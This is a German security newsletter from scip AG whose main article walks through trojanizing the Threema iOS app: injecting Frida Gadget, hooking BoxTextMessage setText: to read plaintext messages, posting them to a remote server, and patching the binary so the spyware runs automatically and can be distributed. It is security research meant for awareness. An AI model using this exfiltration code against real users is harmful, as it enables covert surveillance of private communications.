
Editorial
April 2025: Limiten der Verschlüsselung
Threema ist eine der sichersten Messaging-Applikation der Welt. Gehostet auf Schweizer Servern, Open Source, Softwareentwicklung und Kundensupport in-house bei Threema in der Schweiz und Ende-zu-Ende-Verschlüsselung. Das bedeutet: Kein Mitlesen durch Dritte; Threema selbst kann Nachrichten nicht einsehen. Anonyme Nutzung; Keine Telefonnummer oder E-Mail zur Anmeldung notwendig. Peer-to-Peer-Verschlüsselung; Nachrichten werden direkt verschlüsselt und nur der Empfänger kann sie entschlüsseln. Schutz vor Metadaten-Überwachung; Keine Erhebung von Nutzerdaten und keine Werbung.
Gibt es dennoch Möglichkeiten?
Ja, die gibt es. Zum Beispiel: Jailbreak oder unsichere Apps, Spy- Stalkerware & Überwachungssoftware, Phishing-Angriffe, Schwachstellen in iOS oder Applikationen, um einige zu nennen.
Wenn das verwendete System kompromittiert ist, kann selbst eine sichere Applikation wie Threema nicht mehr garantieren, dass Daten privat bleiben. Im Artikel Threema-Nachrichten auf iOS analysieren von Ian Boschung wird eine Möglichkeit zur Exfiltration von Nachrichten im Klartext aufgezeigt. Im Falle der Installation von unsicherer oder manipulierter Applikationen auf dem getesteten iPhone Gerät.
Das im Labs Artikel beschriebene Vorgehen ist keine Schwachstelle in Threema.
Wir freuen uns sehr Sie zu unserer Leserschaft zählen zu dürfen, herzlichen Dank von der gesamten scip AG. Viel Spass beim lesen der spannenden Artikel sowie dem durchstöbern des aktuellen scip monthly Security Summary.

Mobile Security Testing
Sichere Mobile Applikationen und Kommunikation, wir bringen Antworten.

Darknet
Wir helfen Ihnen dabei, dass ihre Daten nicht im Darknet auftauchen.
News
Das ist bei uns passiert
NZZ am Sonntag
Die NZZ am Sonntag veröffentlicht, unter dem Titel Mord per Herzschrittmacher, eine kleine Auswahl der durch das Research Team der scip AG aufgedeckten Schwachstellen (>40 Stk.) in weltweit eingesetzten Medizinal Geräten.
Die bei der beauftragten Forschung gefundenen Zero-Day Schwachstellen in Infusionspumpen, Herzschrittmachern, Monitoringsystemen etc. wurden nach dem Coordinated Vulnerability Disclosure (CVD) Vorgehen den betroffenen Herstellern mitgeteilt. Marc Ruef (Chef der scip AG Research Abteilung), spricht auch über die Drohungen, per Anwaltskanzleien, einzelner betroffener Unternehmen.
Das Thema Cybersecurity und auch die damit einhergehenden Risiken sowie die notwendige Resilienz gegenüber Cyberangriffen ist in unserem täglichen Leben angekommen. Ein aktuelles Thema welches nicht auf die leichte Schulter genommen werden darf. Machen wir die Welt einen sichereren Ort, profitieren auch Sie von unserer Erfahrung und Expertise.
Update international 02.04.2025: Artikel in Bild Artikel in Daily Mail
SRF 10 vor 10 Interview - Beitrag Nach US-Sicherheitspanne
Der aktuelle Skandal zur Übermittlung höchst sensitiver Informationen in den USA, wirft zurecht hohe Wellen. Anscheinend wurden über das Chat Program Signal Militärpläne ausgetauscht (Waffentypen, Personal, Zeitpunkte, sogar echte Namen der Vorort Beobachter wurden mutmasslich enthüllt). In Sicherheitskreisen ein absolutes No Go über einen solchen Kanal. Zusätzlich wurde aus versehen der Journalist Jeffrey Goldberg in die Houthi PC small group eingeladen. Die Bezeichnung PC des Chats, steht im Sprachgebrauch des Weissen Hauses für Principals Committee, somit die oberste Riege.
Wie kann so etwas passieren, werden die Verantwortlichen zur Rechenschaft gezogen und kann so etwas auch in der Schweiz passieren? Im Beitrag des SRF Nach US-Sicherheitspanne: Ist das in der Schweiz auch möglich? wird nebst der Nationalrätin Priska Seiler Graf und dem Nationalrat Stefan Müller-Altermatt (beide Mitglieder der Geschäftsprüfungsdelegation GPDel) auch unser Marc Ruef (Chef der scip AG Research Abteilung) interviewt.
Machen wir die Welt einen sichereren Ort, profitieren auch Sie von unserer Erfahrung und Expertise.
Workshop im AI-Village von Swiss Cyber Storm
Am 28. Oktober 2025 findet in Bern die Swiss Cyber Storm Konferenz mit zugehörigem AI-Village statt. Unsere Andrea Hauser, Ralph Meier, Yann Santschi, Lucie Hoffmann und Marisa Tschopp werden im AI-Village hands-on Workshops durchführen in den Bereichen AI Detection – Spot the AI, The Deepfake Experience und AI Manipulation – Bypassing Security Measures. Tickets können bereits jetzt online gekauft werden.
Seien Sie potentiellen Angreifern einen scip AG sicheren Schritt voraus.
Fachartikel
Aktuelle Erkenntnisse
DISCLAIMER: Dies ist keine Schwachstelle in Threema. Damit die Exfiltration von Nachrichten funktioniert, ist physischer Zugriff auf das Gerät und die Kenntnis des Passcodes erforderlich oder das Opfer muss die manipulierte App manuell installieren.
Dieser Artikel ist in die folgenden Zwischenschritte unterteilt:
- Das Frida Gadget in die App einfügen
- Nach einer Funktion suchen, die die Nachrichten im Klartext verarbeitet
- Die gesendeten und empfangenen Nachrichten an den angeschlossenen Computer senden
- Nachrichten an einen Server unter unserer Kontrolle senden
- Bonus: Unser Agent startet automatisch
Der erste Schritt kann übersprungen werden, wenn ein Gerät mit Jailbreak verwendet wird. Dieser Artikel setzt Grundkenntnisse in iOS Mobile Application Testing und dem Tool Frida voraus.
Das Frida Gadget in die App einfügen
Wenn wir ein Gerät ohne Jailbreak verwenden wollen, was alle neueren Geräte und iOS-Versionen einschliesst, müssen wir das Frida Gadget in die App einfügen, um die dynamischen Instrumentierungsfunktionen von Frida nutzen zu können. Das Tool objection bietet dazu einen vollautomatischen Befehl zur Ausführung aller erforderlichen Schritte, aber wir zeigen hier den manuellen Weg, um die volle Kontrolle über alle in der App vorgenommenen Änderungen zu haben.
Alle Apps auf iOS enthalten eine Code-Signatur, die sicherstellt, dass keine Änderungen vorgenommen wurden. Da wir einige der Binärdateien in der App ändern wollen, müssen wir diese Code-Signatur neu generieren. Die dafür benötigten Zertifikate und Schlüssel werden als Provisioning Profile bezeichnet und können mit einem gültigen Developer-Account bei Apple angefordert werden. Um ein gültiges Provisioning Profile zu erhalten, erstellen wir ein leeres Xcode-iOS-App-Projekt und installieren es auf dem Zielgerät. Xcode registriert das Gerät automatisch und generiert ein Provisioning Profile, das wir später zur erneuten Unterzeichnung der gepatchten App verwenden können. Wir benötigen ausserdem die IPA von Threema und die neueste Version des Frida Gadget für iOS. Dann können wir die folgenden Befehle ausführen, um das Frida Gadget in das App-Paket zu kopieren und eine Load-Instruktion in das Hauptprogramm einzufügen:
> unzip Threema.ipa && cd Payload/Threema.app
> cp <location of frida gadget> Frameworks/FridaGadget.dylib
> insert_dylib —strip-codesig —inplace Frameworks/FridaGadget.dylib Threema
> cd ../../ && zip -r Threema_frida_gadget.ipa Payload
Um die Codesignatur neu zu generieren gibt es verschiedene Tools, bei uns hat sich ios-app-signer als zuverlässig erwiesen. Bei Threema hatten wir jedoch das Problem, dass die App auch nach dem Signieren während dem Start abgestürzt ist und die folgende Fehlermeldung und Backtrace ausgegeben hat:


Die Fehlermeldung und der Backtrace zeigen, dass der Fehler nicht mit Frida zusammenhängt, sondern mit application group identifiers und dem Code-Signing-Prozess. Die application group identifiers sind Teil der entitlements einer App, bei denen es sich um Berechtigungen handelt, die an das Provisioning Profile gebunden sind und von Apple validiert werden.
Entitlements der originalen Threema-App:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"> <dict> <key>application-identifier</key> <string>xxxxxxxx.ch.threema.iapp</string> <key>aps-environment</key> <string>production</string> [ … ] <key>com.apple.developer.team-identifier</key> <string>xxxxxxxx</string> <key>com.apple.developer.usernotifications.communication</key> <true/> <key>com.apple.security.application-groups</key> <array> <string>group.ch.threema</string> </array> <key>keychain-access-groups</key> <array> <string>xxxxxxxx.ch.threema.iapp</string> </array> </dict>
</plist>
Entitlements bei der von uns signierten, manipulierten App:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"> <dict> <key>application-identifier</key> <string>HB5LB87MX5.ch.scip.threema.Threema</string> <key>com.apple.developer.team-identifier</key> <string>HB5LB87MX5</string> <key>get-task-allow</key> <true/> <key>keychain-access-groups</key> <array> <string>HB5LB87MX5.*</string> </array> </dict>
</plist>
Es ist ersichtlich, dass Threema Zugriff auf die Application Group group.ch.threema hat und unsere gepatchte App nicht, was der Grund für die beobachtete Fehlermeldung sein könnte. Wir können eine App-Gruppe zu unseren Entitlements in Xcode im Abschnitt Singing & Capabilities hinzufügen. Da Apple uns daran hindert, dieselbe wie in der ursprünglichen Threema-App zu wählen, müssen wir eine andere verwenden, z. B. group.scip.threema. Da unsere App nun Zugriff auf einen Application Group Container hat, müssen wir ihr mitteilen, dass sie group.scip.threema anstelle von group.ch.threema verwenden soll. Eine Suche im Projekt nach der alten Zeichenkette für die Anwendungsgruppe zeigt, dass sie in der Datei Info.plist gespeichert ist, wo sie geändert werden kann. Nach der erneuten Code-Signierung des Pakets wird es korrekt gestartet und wir können eine vorhandene Threema-ID aus der ursprünglichen App übertragen.
Nach einer Funktion suchen, die die Nachrichten im Klartext verarbeitet
Um nach interessanten Funktionen zu suchen, verwenden wir das Tool objection. Wir beginnen mit einer Suche nach allen Klassen, die die Zeichenfolge message enthalten, und verwenden dazu den Befehl ios hooking search classes message, was zu 1600 Klassen führt. Um die Resultate etwas einzuschränken, versuchen wir nach TextMessage zu suchen, und erhalten 26 Ergebnisse.
ch.scip.threema.Threema on (iPhone: 16.7.10) [usb] # ios hooking search classes TextMessage
[ … ]
BoxTextMessage
GroupTextMessage
TextMessageEntity
TextMessageEntity_TextMessage_
NSKVONotifying_TextMessageEntity_TextMessage_
Threema.ChatViewTextMessageTableViewCellFound 26 classes
Um die vielversprechenden Klassen etwas genauer zu untersuchen, kann der Befehl ios hooking list class_methods verwendet werden. Bei der Klasse BoxTextMessage finden wir vielversprechende Funktionen:
Mit objection können wir auch gleich die Ausführung dieser Funktion abfangen und die Parameter auswerten. Dabei können wir gesendete und empfangene Nachrichten sehen:
ch.scip.threema.Threema on (iPhone: 16.7.10) [usb] # ios hooking list class_methods BoxTextMessage
+ supportsSecureCoding
- type
- body
- flagShouldPush
- isContentValid
- allowSendingProfile
- supportsForwardSecurity
- minimumRequiredForwardSecurityVersion
- quotedBody
- initWithCoder:
- encodeWithCoder:
- text
- setText:
- quotedMessageId
- setQuotedMessageId:
- .cxx_destructFound 16 methods
ch.scip.threema.Threema on (iPhone: 16.7.10) [usb] # ios hooking watch method "-[BoxTextMessage setText:]" —dump-args
(agent) Found selector at 0×102aacbbc as -[BoxTextMessage setText:]
(agent) Registering job 750798. Type: watch-method for: -[BoxTextMessage setText:]
ch.scip.threema.Threema on (iPhone: 16.7.10) [usb] #
(agent) [750798] Called: -[BoxTextMessage setText:] 1 arguments(Kind: instance) (Super: AbstractMessage)
(agent) [750798] Argument dump: [BoxTextMessage setText: Hello World!]
(agent) [750798] Called: -[BoxTextMessage setText:] 1 arguments(Kind: instance) (Super: AbstractMessage)
(agent) [750798] Argument dump: [BoxTextMessage setText: Hi]
Die gesendeten und empfangenen Nachrichten an den angeschlossenen Computer senden
Jetzt wollen wir diesen Prozess mit einem Frida-Agenten automatisieren. Dazu generieren wir einen neuen Boilerplate-Agenten mit Frida-create -t agent. In der Datei agent/index.ts können wir den Standardcode entfernen und der Funktion BoxTextMessage setText einen Interceptor hinzufügen, der den Parameter protokolliert. Dabei muss das Script den Text aus dem dritten Element im args-Array laden, da beim Aufruf einer Klassenmethode in Objective-C das erste Argument einen Pointer auf die Klasseninstanz und das zweite Argument den Methodenselektor (einen Zeiger auf eine Zeichenfolge, die die Methode identifiziert) enthält. Da der Parameter nicht die Zeichenfolge selbst, sondern ein Pointer auf einen String ist, erstellt das Skript aus dem Pointer ein ObjC-Objekt.
import { log } from "./logger.js";const { BoxTextMessage } = ObjC.classes;
Interceptor.attach(BoxTextMessage['- setText:'].implementation, { onEnter: function (args) { text = new ObjC.Object(args[2]); log(`[ ${(new Date()).toISOString()} ]: ${text.toString()}`); }
});
Die folgenden zwei Befehle werden verwendet, um den Agenten zu erstellen und ihn in der App einzufügen, die derzeit auf einem verbundenen Gerät im Vordergrund ist:
> npm run build
> Frida -UF -l _agent.js
[ … ] . . . . Connected to iPhone (id=3c8efcd76b83ba4576e453f7718a8e2a00ae661b)
[ 2025-03-19T09:12:02.979Z ]: Test Message
[ 2025-03-19T09:12:21.330Z ]: Test Answer
Nachrichten an einen Server unter unserer Kontrolle zu senden
Für einen möglichen Angreifer wäre es nützlich, wenn das Skript die Nachrichten an einen Webserver senden würde, damit das Gerät nicht ständig mit einem Computer verbunden sein muss. Wir passen diesen Code von github an unsere Bedürfnisse an und senden den Nachrichtentext im Body eines Post-Requests an einen Server unserer Wahl. Der Server kann dann ein einfaches PHP-Skript hosten, das die Nachrichten in einer Textdatei protokolliert oder anderweitig verarbeitet.
import { log } from "./logger.js";const { BoxTextMessage, NSString, NSMutableURLRequest, NSURL, NSURLConnection } = ObjC.classes;
// https://github.com/Frida/Frida/issues/1158
const sendTextToRemote = (text: any) => { var str = NSString['alloc']()['initWithString:'](`log_line=${text}`) ; var postData = str.dataUsingEncoding_(4); var len = str.length; var strLength = NSString['stringWithFormat:']('%d', len); var request = NSMutableURLRequest['alloc']()['init'](); var url = NSURL.URLWithString_('https://www.example.org/threema_log.php'); var method = NSString['alloc']()['initWithString:']('POST'); var httpF = NSString['alloc']()['initWithString:']('Content-Length'); var httpL = NSString['alloc']()['initWithString:']('Content-Type'); request.setURL_(url); request.setHTTPMethod_(method); request.setValue_forHTTPHeaderField_(strLength,httpF); request.setValue_forHTTPHeaderField_("application/x-www-form-urlencoded", httpL); request.setHTTPBody_(postData); var nil = ObjC.Object(ptr("0×0")); var d = NSURLConnection['sendSynchronousRequest:returningResponse:error:'](request,nil,nil);
};Interceptor.attach(BoxTextMessage['- setText:'].implementation, { onEnter: function (args) { const text = new ObjC.Object(args[2]); log(`[ ${(new Date()).toISOString()} ]: ${text.toString()}`); sendTextToRemote(text) }
});


Bonus: Unser Agent startet automatisch
Bis jetzt musste das Frida-Skript bei jedem App-Start jeweils manuell gestartet werden, wir wollen aber dass dies automatisch passiert. Frida Gadget kann dies mit seinem Skriptmodus für uns erledigen. Wir kopieren die Datei _agent.js in das Verzeichnis Payload/Threema.app/Frameworks und erstellen die Datei FridaGadget.config an derselben Stelle. Der folgende JSON-Code in der Konfigurationsdatei weist Frida an, unseren Agenten beim Start auszuführen:
{ "interaction": { "type": "script", "path": "_agent.js" }
}
Es gibt dabei eine Einschränkung: Bei einem Gerät ohne Jailbreak muss beim Starten der App ein Debugger angeschlossen werden. Wenn Frida eine Funktion einbindet, ändert sie den Code dieser Funktion im Maschinencode. In diesem Fall ist die Codesignatur nicht mehr gültig und iOS stoppt die Ausführung der App. Wenn ein Debugger während des Starts der App angehängt wird, wird diese Einschränkung gelockert und die Code-Signatur wird während der Laufzeit der App nicht überprüft (der Debugger kann getrennt werden, sobald die App gestartet wurde). Eine Lösung für dieses Problem besteht darin, das Programm im Voraus zu patchen. Wir ändern die Funktionen, die wir abfangen möchten, so, dass der erste Befehl der Funktion ein Jump zu Frida ist. Wenn Frida angehängt ist, kann dort der JavaScript-Agent ausgeführt werden und dann zur normalen Funktionsausführung zurück gesprungen werden. Dies manuell zu tun, wäre mühsam, aber in Frida ist ein Tool namens gum-graft enthalten, das diese Aufgaben automatisiert.
Wir wissen bereits, welche Funktionsaufrufe wir abfangen wollen (BoxTextMessage setText:), sodass wir nur diese eine Stelle im Code patchen müssen. Um die Adresse der Funktion zu erhalten, kann der Befehl dyld_info verwendet werden, welcher die Tabelle LC_FUNCTION_STARTS in der Binärdatei liest. gum-graft kann dann die Binärdatei an dem gefundenen Funktions-Offset 0×18bbc patchen:
> xcrun dyld_info -function_starts Frameworks/ThreemaFramework.framework/ThreemaFramework | grep "BoxTextMessage setText" 0×00018BBC -[BoxTextMessage setText:]
> gum-graft Frameworks/ThreemaFramework.framework/ThreemaFramework —instrument=0×18bbc
In unserem Fall hat dies die Binärdatei irgendwie beschädigt, so dass sie nicht mehr ausgeführt werden konnte und der Befehl xcrun dyld_info die Fehlermeldung dyld_info: 'ThreemaFramework_broken' chained fixups, seg_count does not match number of segments zurückgab. Wir sind uns nicht sicher, ob dies daran liegt, dass die Binärdatei mit speziellen Compiler- und Linker-Flags erstellt wurde, oder ob es sich um einen Fehler in Fridas Gum-Graft-Tool handelt. Bei der Untersuchung der Binärdatei ThreemaFramework mit verschiedenen Command Line Tools und Ghidra haben wir einige Beobachtungen gemacht und eine Lösung gefunden: gum-graft fügt der Binärdatei zwei Segmente hinzu: __FRIDA_TEXT0 und __FRIDA_DATA0 und ändert die Funktion bei Offset 0x18bbc, die sich in der Sektion __TEXT,__text befindet. Mit diesen Informationen und dem Tool LIEF.re mit Python-Bindings ist es möglich, die geänderten Teile aus dem gepatchten in das ursprüngliche Binärprogramm zu kopieren.
>>> import lief
>>> original_binary = lief.parse("ThreemaFramework")
>>> patched_binary = lief.parse("ThreemaFramework_patched")
>>> print(patched_binary.segments[3])
Command: SEGMENT_64
Offset: 0×1138
Size: 0×98name=__FRIDA_TEXT0, vaddr=0×804000, vsize=0×4000 offset=0×7e4000, size=16384, max protection=5, init protection=5 flags=0
>>> print(patched_binary.segments[4])
Command: SEGMENT_64
Offset: 0×11d0
Size: 0×98name=__FRIDA_DATA0, vaddr=0×808000, vsize=0×4000 offset=0×7e8000, size=16384, max protection=3, init protection=3 flags=0
>>> original_binary.add(patched_binary.segments[3])
<lief._lief.MachO.SegmentCommand object at 0×10e48a1d0>
>>> original_binary.add(patched_binary.segments[4])
<lief._lief.MachO.SegmentCommand object at 0×10e48a290>
>>> original_binary.get_section("__text").content = patched_binary.get_section("__text").content
>>> original_binary.write("ThreemaFramework")
Bevor wir die gepatchte Binärdatei ausführen, müssen wir Frida noch mitteilen, dass nur gepatchte Funktionen instrumentiert werden können. Dies können wir in der Datei FirdaGadget.config tun, indem wir die Option "code_signing": "required" hinzufügen. Mit diesen Änderungen kann die App vom Computer und Debugger getrennt werden und startet einwandfrei. Dies bedeutet auch, dass es einfacher ist, die App an andere Personen zu verteilen, z. B. über Testflight oder alternative App-Stores.
Fazit
Wir haben gezeigt, dass es möglich ist, Nachrichten aus Chat-Apps wie Threema mithilfe dynamischer Instrumentierungswerkzeuge zu exfiltrieren. Wir haben die Methode weiter verfeinert, indem wir die Nachrichten an einen Webserver senden und die Instrumentierung automatisch starten. Durch das Patchen der Binärdatei haben wir eine Version von Threema erstellt, die über Apple TestFlight oder andere alternative App-Stores verteilt werden kann. In Kombination mit einem Social-Engineering-Angriff ist es plausibel, dass dies zum Ausspionieren eines Opfers verwendet werden kann, und es zeigt, wie wichtig es ist, Software nur von vertrauenswürdigen Quellen zu installieren, selbst auf geschlossenen Systemen wie iOS.
Sind Sie bereit?
Unsere Spezialisten kontaktieren Sie gern!
- Open Source devs say AI crawlers dominate traffic, forcing blocks on entire countries (arstechnica.com)
- The mind-changing method measured in minutes (bbc.com)
- Cloudflare turns AI against itself with endless maze of irrelevant facts (arstechnica.com)
- AI ‘candidate’ fails to pass mock radiology boards (healthimaging.com)
- Assessing and alleviating state anxiety in large language models (nature.com)
- AI fakers exposed in tech dev recruitment: postmortem (newsletter.pragmaticengineer.com)
- L’Assemblee nationale vote pour le maintien de la confidentialite des messageries cryptees, lors d’une nuit agitee (lemonde.fr)
- The F-35 as a Subscription Service: Power, Dependency, and Strategic Control DaaS, Defense as a Service. (xxtomcooperxx.substack.com)
- AI hallucinations: ChatGPT created a fake child murderer (noyb.eu)
- Tesla (TSLA) accounting raises red flags as report shows $1.4 billion missing (electrek.co)
- DOGE to Fired CISA Staff: Email Us Your Personal Data (krebsonsecurity.com)
- Elon Musk Installs ‘Quick And Dirty’ Turbines To Power xAI’s Memphis Data Centers (forbes.com)
- Tesla fans exposes Tesla’s own shadiness in attempt to defend Autopilot crash (electrek.co)
- What Is Exposure Management and Why Does It Matter? (tenable.com)
- SpaceX Has Finally Figured Out Why Starship Exploded, And The Reason Is Utterly Embarrassing (planetearthandbeyond.co)
- Firmware update bricks HP printers, makes them unable to use HP cartridges (arstechnica.com)
- The hidden world beneath the shadows of YouTube’s algorithm (bbc.com)
- Denmark’s postal service to stop delivering letters (bbc.com)
- Chatbots Are Cheating on Their Benchmark Tests (theatlantic.com)
- AI reasoning models can cheat to win chess games (technologyreview.com)
- The Firefox I loved is gone – how to protect your privacy on it now (zdnet.com)
- Elon Musk’s AI said he and Trump deserve the death penalty (theverge.com)
- Trump administration retreats in fight against Russian cyber threats (theguardian.com)
- As Israel uses US-made AI models in war, concerns arise about tech’s role in who lives and who dies (apnews.com)
Sind Sie bereit?
Unsere Spezialisten kontaktieren Sie gern!
Über den smSS
Das scip Monthly Security Summary erscheint monatlich und ist kostenlos.
- Anmeldung: smss-subscribe@scip.ch
- Abmeldung: smss-unsubscribe@scip.ch
Informationen zum Datenschutz.
Eine Haftung für die Richtigkeit der Veröffentlichungen kann trotz sorgfältiger Prüfung durch die Redaktion des Herausgebers, den Redaktoren und Autoren nicht übernommen werden. Die geltenden gesetzlichen und postalischen Bestimmungen bei Erwerb, Errichtung und Inbetriebnahme von elektronischen Geräten sowie Sende- und Empfangseinrichtungen sind zu beachten.
Über scip AG
Wir überzeugen durch unsere Leistungen. Die scip AG wurde im Jahr 2002 gegründet. Innovation, Nachhaltigkeit, Transparenz und Freude am Themengebiet sind unsere treibenden Faktoren. Dank der vollständigen Eigenfinanzierung sehen wir uns in der sehr komfortablen Lage, vollumfänglich herstellerunabhängig und neutral agieren zu können und setzen dies auch gewissenhaft um. Durch die Fokussierung auf den Bereich Information Security und die stetige Weiterbildung vermögen unsere Mitarbeiter mit hochspezialisiertem Expertenwissen aufzuwarten.

